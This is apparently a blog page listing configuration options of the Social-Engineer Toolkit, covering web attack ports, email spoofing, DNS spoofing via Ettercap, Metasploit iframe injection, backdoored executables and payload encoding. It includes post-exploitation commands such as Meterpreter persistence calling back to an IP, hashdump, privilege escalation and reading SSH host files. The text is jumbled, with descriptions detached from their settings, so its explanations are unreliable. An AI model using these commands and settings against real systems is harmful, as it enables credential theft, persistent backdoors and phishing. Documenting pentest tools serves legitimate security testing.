![]() ![]() APACHE_DIRECTORY=/var/Used for the Java applet attack or Metasploit exploit. This will increase the speed of the attack vector. This will be used for the web server bind port APACHE_SERVER=OFF Use Apache instead of standard python web servers. MLITM_PORT=80 Man Left In The Middle port. WEBATTACK_EMAIL=OFF Set to ON if you want to use email in conjunction with Web Attack. SENDMAIL=OFF sendmail ON or OFF for spoofing email addresses EMAIL_PROVIDER=GMAIL Email provider list supports GMAIL, HOTMAIL and YAHOO. Set this to ON only if you want SET to auto detect your interface. AUTO_DETECT=ON Auto detection of IP address interface using Google. If Dsniff is set to ON, Ettercap will automatically be disabled. ![]() DSNIFF=OFF Define to use Dsniff or not using website attack. ![]() ETTERCAP=OFF Use Ettercap when using website attack ETTERCAP_PATH=/usr/share/ettercap Ettercap home directory (needed for DNS_SPOOF) ETTERCAP_DSNIFF_INTERFACE=eth0 Specify what interface you want Ettercap or Dsniff to listen to. If egress filtering is blocking it, you may replace with 21 or 53. Example: run getsystem run hashdump run persistence METASPLOIT_IFRAME_PORT=8080 Port used for the IFRAME injection using the Metasploit browser attacks. Note that you need to separate commands with a semi-column. METERPRETER_MULTI_COMMANDS=run persistence -r 192.168.1.5 -p 21 -i 300 -X -A getsystem LINUX_METERPRETER_MULTI_COMMANDS=uname id cat ~/.ssh/known_hosts Commands you want to run once a Meterpreter session has been established. Note that you need to separate the commands by a semi-column. First turn this trigger on, then configure the flags. Tries to elevate permissions and other tasks in an automated fashion. This may be important if we are sleeping and need to run persistence. METERPRETER_MULTI_SCRIPT=OFF LINUX_METERPRETER_MULTI_SCRIPT=OFF Run multiple Meterpreter scripts once a session is active. Specifying this will keep the application working. Normally, when legit.binary is used, it will render the application useless. BACKDOOR_EXECUTION=ON Used for the backdoored executable if you want to keep the executable to still work. Currently set to legit.binary which is just calc.exe, as an example. This usually has better Antivirus detection. CUSTOM_EXE=legit.binary Custom EXE you want to use for Metasploit encoding. However, it can introduce buggy reusults. It can be useful if the victim closes the browser. AUTO_MIGRATE=OFF If this option is set, the Metasploit payloads will automatically migrate to notepad once the applet is executed. ENCOUNT=4 How many times SET should encode a payload if you're using standard Metasploit encoding options. METASPLOIT_DATABASE=postgresql Tells what database to use when using the Metasploit framework. Parameters METASPLOIT_PATH=/opt/metasploit/msf3 Defines the path to Metasploit. The configuration file is available in /pentest/exploits/set/config. ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |